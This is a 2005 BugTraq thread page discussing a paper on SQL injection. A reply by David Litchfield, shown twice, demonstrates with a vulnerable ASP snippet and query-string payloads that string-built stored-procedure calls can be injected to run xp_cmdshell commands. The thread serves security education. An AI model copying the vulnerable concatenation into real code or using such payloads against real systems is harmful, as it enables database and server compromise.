BugTraq
Back to list
|
Post reply
RE: Paper: SQL Injection Attacks by Example
Jan 05 2005 08:11PM
Scovetta, Michael V (Michael Scovetta ca com)
(3 replies)
Re: Paper: SQL Injection Attacks by Example
Jan 05 2005 09:37PM
Chip Andrews (chip sqlsecurity com)
RE: Paper: SQL Injection Attacks by Example
Jan 05 2005 09:09PM
David Litchfield (davidl ngssoftware com)
>David,
>Actually, to nitpick your comment a bit, stored procedures usually have
typed input variables:
>create procedure foo ( a int, b varchar(20) ) as ...
This has no bearing on the issue.
If from the code of the app I perform something like
strSQL = "exec foo(" & request.querystring("a") & "," &
request.querystring("b") & ")"
Conn.execute(strSQL)
then I can either set a in the query string to
?a=1,'foo');exec+master..xp_cmdshell+'dir'--&b=foo
Or alternatively I can set b in the query string to
?a=1&b=foo');exec+master..xmp_cmdshell+'dir'--
Either way I'm using a stored procedure and I can inject into the app.
Cheers,
David
[ reply ]
Re: Paper: SQL Injection Attacks by Example
Jan 05 2005 08:56PM
Cory Foy (Cory Foy mobilehwy com)
Privacy Statement
Copyright 2010, SecurityFocus
>Actually, to nitpick your comment a bit, stored procedures usually have
typed input variables:
>create procedure foo ( a int, b varchar(20) ) as ...
This has no bearing on the issue.
If from the code of the app I perform something like
strSQL = "exec foo(" & request.querystring("a") & "," &
request.querystring("b") & ")"
Conn.execute(strSQL)
then I can either set a in the query string to
?a=1,'foo');exec+master..xp_cmdshell+'dir'--&b=foo
Or alternatively I can set b in the query string to
?a=1&b=foo');exec+master..xmp_cmdshell+'dir'--
Either way I'm using a stored procedure and I can inject into the app.
Cheers,
David
[ reply ]